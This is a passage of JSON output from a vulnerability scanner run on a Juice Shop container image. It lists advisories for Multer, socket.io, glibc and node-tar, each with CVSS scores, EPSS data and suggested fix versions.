request","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-7338","epss":0.00617,"percentile":0.44698,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-7338","cwe":"CWE-248","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}],"fix":{"versions":["2.0.2"],"state":"fixed","available":[{"version":"2.0.2","date":"2025-07-18","kind":"first-observed"}]},"advisories":[],"risk":0.46275},"relatedVulnerabilities":[{"id":"CVE-2025-7338","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2025-7338","namespace":"nvd:cpe","severity":"High","urls":["https://cna.openjsf.org/security-advisories.html","https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b","https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.","cvss":[{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-7338","epss":0.00617,"percentile":0.44698,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-7338","cwe":"CWE-248","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-fjgf-rc76-4x9p","versionConstraint":">=1.4.4-lts.1,<2.0.2 (semantic)"},"fix":{"suggestedVersion":"2.0.2"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-v52c-386h-88mc","dataSource":"https://github.com/advisories/GHSA-v52c-386h-88mc","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc","https://nvd.nist.gov/vuln/detail/CVE-2026-2359","https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab","https://cna.openjsf.org/security-advisories.html","https://www.cve.org/CVERecord?id=CVE-2026-2359"],"description":"Multer vulnerable to Denial of Service via resource exhaustion","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-2359","epss":0.00555,"percentile":0.41758,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-2359","cwe":"CWE-772","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}],"fix":{"versions":["2.1.0"],"state":"fixed","available":[{"version":"2.1.0","date":"2026-03-01","kind":"first-observed"}]},"advisories":[],"risk":0.44954999999999995},"relatedVulnerabilities":[{"id":"CVE-2026-2359","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-2359","namespace":"nvd:cpe","severity":"High","urls":["https://cna.openjsf.org/security-advisories.html","https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab","https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc","https://www.cve.org/CVERecord?id=CVE-2026-2359"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-2359","epss":0.00555,"percentile":0.41758,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-2359","cwe":"CWE-772","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-v52c-386h-88mc","versionConstraint":"<2.1.0 (semantic)"},"fix":{"suggestedVersion":"2.1.0"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-xf7r-hgr6-v32p","dataSource":"https://github.com/advisories/GHSA-xf7r-hgr6-v32p","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p","https://nvd.nist.gov/vuln/detail/CVE-2026-3304","https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee","https://cna.openjsf.org/security-advisories.html","https://www.cve.org/CVERecord?id=CVE-2026-3304"],"description":"Multer vulnerable to Denial of Service via incomplete cleanup","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3304","epss":0.00555,"percentile":0.41758,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3304","cwe":"CWE-459","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}],"fix":{"versions":["2.1.0"],"state":"fixed","available":[{"version":"2.1.0","date":"2026-03-01","kind":"first-observed"}]},"advisories":[],"risk":0.44954999999999995},"relatedVulnerabilities":[{"id":"CVE-2026-3304","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-3304","namespace":"nvd:cpe","severity":"High","urls":["https://cna.openjsf.org/security-advisories.html","https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee","https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p","https://www.cve.org/CVERecord?id=CVE-2026-3304"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3304","epss":0.00555,"percentile":0.41758,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3304","cwe":"CWE-459","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-xf7r-hgr6-v32p","versionConstraint":"<2.1.0 (semantic)"},"fix":{"suggestedVersion":"2.1.0"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-5528-5vmv-3xc2","dataSource":"https://github.com/advisories/GHSA-5528-5vmv-3xc2","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2","https://nvd.nist.gov/vuln/detail/CVE-2026-3520","https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752","https://cna.openjsf.org/security-advisories.html","https://www.cve.org/CVERecord?id=CVE-2026-3520"],"description":"Multer Vulnerable to Denial of Service via Uncontrolled Recursion","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3520","epss":0.0055,"percentile":0.41476,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3520","cwe":"CWE-674","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}],"fix":{"versions":["2.1.1"],"state":"fixed","available":[{"version":"2.1.1","date":"2026-03-05","kind":"first-observed"}]},"advisories":[],"risk":0.44549999999999995},"relatedVulnerabilities":[{"id":"CVE-2026-3520","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-3520","namespace":"nvd:cpe","severity":"High","urls":["https://cna.openjsf.org/security-advisories.html","https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752","https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2","https://www.cve.org/CVERecord?id=CVE-2026-3520"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-3520","epss":0.0055,"percentile":0.41476,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-3520","cwe":"CWE-674","source":"ce714d77-add3-4f53-aff5-83d477b104bb","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-5528-5vmv-3xc2","versionConstraint":"<2.1.1 (semantic)"},"fix":{"suggestedVersion":"2.1.1"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-5450","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-5450","namespace":"debian:distro:debian:13","severity":"Critical","urls":[],"description":"Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":9.8,"exploitabilityScore":3.9,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5450","epss":0.00451,"percentile":0.35672,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5450","cwe":"CWE-122","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"},{"cve":"CVE-2026-5450","cwe":"CWE-787","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":0.4239400000000001},"relatedVulnerabilities":[{"id":"CVE-2026-5450","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-5450","namespace":"nvd:cpe","severity":"Critical","urls":["https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u","https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450"],"description":"Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":9.8,"exploitabilityScore":3.9,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-5450","epss":0.00451,"percentile":0.35672,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-5450","cwe":"CWE-122","source":"3ff69d7a-14f2-4f67-a097-88dee7810d18","type":"Secondary"},{"cve":"CVE-2026-5450","cwe":"CWE-787","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-5450","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"GHSA-25hc-qcg6-38wj","dataSource":"https://github.com/advisories/GHSA-25hc-qcg6-38wj","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj","https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115","https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c","https://nvd.nist.gov/vuln/detail/CVE-2024-38355"],"description":"socket.io has an unhandled 'error' event","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-38355","epss":0.0069,"percentile":0.47827,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-38355","cwe":"CWE-20","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2024-38355","cwe":"CWE-754","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["4.6.2"],"state":"fixed","available":[{"version":"4.6.2","date":"2024-06-20","kind":"first-observed"}]},"advisories":[],"risk":0.41744999999999993},"relatedVulnerabilities":[{"id":"CVE-2024-38355","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2024-38355","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115","https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c","https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj","https://www.vicarius.io/vsociety/posts/unhandled-exception-in-socketio-cve-2024-38355"],"description":"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit `15af22fc22` which has been included in `socket.io@4.6.2` (released in May 2023). The fix was backported in the 2.x branch as well with commit `d30630ba10`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the \"error\" event to catch these errors.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-38355","epss":0.0069,"percentile":0.47827,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-38355","cwe":"CWE-20","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2024-38355","cwe":"CWE-754","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"socket.io","version":"3.1.2"}},"found":{"vulnerabilityID":"GHSA-25hc-qcg6-38wj","versionConstraint":">=3.0.0,<4.6.2 (semantic)"},"fix":{"suggestedVersion":"4.6.2"}}],"artifact":{"id":"pkg:npm/socket.io@3.1.2?package-id=a59f241f8d484687","name":"socket.io","version":"3.1.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/socket.io/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:socket:socket.io:3.1.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/socket.io@3.1.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-677m-j7p3-52f9","dataSource":"https://github.com/advisories/GHSA-677m-j7p3-52f9","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9","https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4","https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf","https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78","https://nvd.nist.gov/vuln/detail/CVE-2026-33151"],"description":"socket.io allows an unbounded number of binary attachments","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-33151","epss":0.00514,"percentile":0.39499,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-33151","cwe":"CWE-20","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-33151","cwe":"CWE-754","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["4.2.6"],"state":"fixed","available":[{"version":"4.2.6","date":"2026-03-19","kind":"first-observed"}]},"advisories":[],"risk":0.41633999999999993},"relatedVulnerabilities":[{"id":"CVE-2026-33151","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-33151","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4","https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf","https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78","https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9"],"description":"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-33151","epss":0.00514,"percentile":0.39499,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-33151","cwe":"CWE-20","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-33151","cwe":"CWE-754","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"socket.io-parser","version":"4.0.5"}},"found":{"vulnerabilityID":"GHSA-677m-j7p3-52f9","versionConstraint":">=4.0.0,<4.2.6 (semantic)"},"fix":{"suggestedVersion":"4.2.6"}}],"artifact":{"id":"pkg:npm/socket.io-parser@4.0.5?package-id=dd154d7bfbaea09c","name":"socket.io-parser","version":"4.0.5","type":"npm","locations":[{"path":"/juice-shop/node_modules/socket.io-parser/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:socket:socket.io-parser:4.0.5:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/socket.io-parser@4.0.5","upstreams":[]}},{"vulnerability":{"id":"GHSA-34x7-hfp2-rc4v","dataSource":"https://github.com/advisories/GHSA-34x7-hfp2-rc4v","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v","https://nvd.nist.gov/vuln/detail/CVE-2026-24842","https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"],"description":"node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","metrics":{"baseScore":8.2,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-24842","epss":0.00519,"percentile":0.39834,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-24842","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-24842","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.7"],"state":"fixed","available":[{"version":"7.5.7","date":"2026-01-29","kind":"first-observed"}]},"advisories":[],"risk":0.40741499999999997},"relatedVulnerabilities":[{"id":"CVE-2026-24842","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-24842","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46","https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"],"description":"node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","metrics":{"baseScore":8.2,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-24842","epss":0.00519,"percentile":0.39834,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-24842","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-24842","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-34x7-hfp2-rc4v","versionConstraint":"<7.5.7 